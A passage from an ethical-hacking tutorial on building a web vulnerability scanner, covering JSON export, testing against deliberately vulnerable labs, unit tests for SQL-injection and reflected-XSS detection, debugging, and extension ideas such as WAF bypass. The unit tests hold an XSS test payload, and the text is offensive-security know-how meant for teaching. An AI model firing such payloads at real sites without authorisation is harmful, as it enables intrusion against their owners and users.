        medium_count=sum(1 for v in vulnerabilities if v.severity == 'medium'),
        low_count=sum(1 for v in vulnerabilities if v.severity == 'low'),
    )
  1. JSON export for tool integration:
    def export_json(vulnerabilities: List[Vulnerability], filepath: str):
     data = {
         'scan_date': datetime.now().isoformat(),
         'total_findings': len(vulnerabilities),
         'findings': [asdict(v) for v in vulnerabilities]
     }
     with open(filepath, 'w') as f:
         json.dump(data, f, indent=2)
    

Testing Strategy

Testing Against Intentionally Vulnerable Applications

  1. DVWA (Damn Vulnerable Web Application)
    • Test at “Low” security level first
    • Progress through Medium and High
    • Your scanner should find SQLi and XSS at Low
  2. OWASP WebGoat
    • Structured lessons for each vulnerability type
    • Verify your scanner finds the intended vulnerabilities
  3. OWASP Juice Shop
    • Modern JavaScript-heavy application
    • Tests your crawler’s ability to handle SPAs

Unit Testing Payloads

def test_sqli_payloads_detected():
    # Test against known vulnerable responses
    vulnerable_response = "You have an error in your SQL syntax"
    assert is_sqli_error(vulnerable_response) == True

    clean_response = "No products found"
    assert is_sqli_error(clean_response) == False

def test_xss_reflection_detection():
    html = '<input value="<script>alert(1)</script>">'
    assert detect_xss_reflection(html, '<script>alert(1)</script>') == True

Common Pitfalls and Debugging

1. “False positives everywhere”

Problem: Scanner reports vulnerabilities that aren’t real

Solutions:

  • Verify by actually exploiting (does payload execute?)
  • Add confidence scoring
  • Require multiple indicators before reporting
  • Filter out honeypot/WAF responses

2. “Missing obvious vulnerabilities”

Problem: Known vulnerable app, scanner finds nothing

Debug steps:

  1. Is the crawler finding the vulnerable pages?
  2. Is the parameter being tested?
  3. Check if WAF is blocking payloads
  4. Try different payload encodings

3. “Crawler goes off-site or loops forever”

Problem: Crawler follows external links or revisits pages

Solutions:

  • Strict domain checking
  • Track visited URLs in a set
  • Set maximum crawl depth
  • Implement timeout per page

4. “XSS not detected even when payload reflects”

Problem: Payload in response but not marked as XSS

Debug steps:

  1. Is response HTML or JSON?
  2. Is payload HTML-encoded in response?
  3. Check if context detection is working

Extensions and Challenges

Beginner Extensions

  1. Add more payloads: Load from external files
  2. Progress reporting: Show real-time scan progress
  3. Proxy support: Route through Burp Suite

Intermediate Extensions

  1. JavaScript rendering: Use Selenium for SPAs
  2. CSRF detection: Check for missing tokens
  3. Session handling: Test with authenticated sessions

Advanced Extensions

  1. WAF bypass payloads: Encoding and obfuscation
  2. API fuzzing: REST/GraphQL vulnerability testing
  3. SSRF detection: With callback server
  4. Stored XSS: Re-check pages for persisted payloads

Real-World Connections

Commercial Scanners

Your project is a simplified version of:

  • Burp Suite Pro - Industry standard web scanner
  • OWASP ZAP - Open source alternative
  • Nuclei - Template-based vulnerability scanner

After this project, study how these tools work—they’re built on the same concepts but with years of refinement.

Bug Bounty Application

These skills directly apply to bug bounty:

  • Subdomain enumeration → More attack surface
  • Automated scanning → Find low-hanging fruit
  • Manual verification → Avoid duplicate reports
  • Report writing → Get paid faster

Self-Assessment Checklist

Core Functionality

  • Crawler discovers all pages and forms
  • SQLi detection works (error-based and time-based)
  • XSS detection works (reflected)
  • Security headers are checked
  • HTML report is generated

Code Quality

  • Modular design (can add new modules easily)
  • Error handling (doesn’t crash on edge cases)
  • Configuration options (timeout, threads, etc.)
  • CLI with –help

Understanding

  • Can explain how SQL injection works at query level
  • Understand difference between XSS contexts
  • Know why parameterized queries prevent SQLi
  • Understand OWASP Top 10 categories

Validation

  • Finds vulnerabilities in DVWA (low security)
  • Minimal false positives on clean application
  • Report is professional quality

Resources

Primary Reading

  • “Bug Bounty Bootcamp” by Vickie Li - Chapters 6-12
  • “The Web Application Hacker’s Handbook” by Stuttard & Pinto
  • “HTTP: The Definitive Guide” by David Gourley

Online Resources

Practice Environments

  • DVWA - docker run -p 80:80 vulnerables/web-dvwa
  • OWASP WebGoat - docker run -p 8080:8080 webgoat/webgoat
  • OWASP Juice Shop - docker run -p 3000:3000 bkimminich/juice-shop

This project is part of the Ethical Hacking & Penetration Testing learning path.